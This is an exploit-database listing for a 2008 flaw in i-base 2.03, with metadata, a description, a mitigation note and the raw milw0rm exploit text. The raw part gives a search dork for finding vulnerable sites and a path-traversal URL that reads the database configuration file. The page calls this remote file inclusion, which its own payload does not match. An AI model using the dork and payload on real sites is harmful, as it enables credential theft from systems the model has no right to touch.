header-logo
Suggest Exploit
vendor:
i-base
by:
Dyshoo
9.3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: i-base
Affected Version From: 02.03
Affected Version To: 02.03
Patch Exists: YES
Related CWE: N/A
CPE: ibase
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

[AFD] i-base <= 2.03

A remote file inclusion vulnerability exists in i-base version 2.03 and prior. An attacker can exploit this vulnerability to include arbitrary files from a remote location and execute arbitrary code on the vulnerable system. The vulnerable parameter is 'filename' in the 'download.php' script.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of i-base.
Source

Exploit-DB raw data:

Name: [AFD] i-base <= 2.03
Author: Dyshoo
Vendor: http://www.i-base.net/
Dork: "inurl:ibase site:de"

http://[site]/ibase/zubehoer/download.php?filename=[file]

Database config:
http://[site]/ibase/zubehoer/download.php?filename=../config/config_db.php

# milw0rm.com [2008-07-24]

Navigation

Suggest Exploit

Services By CQR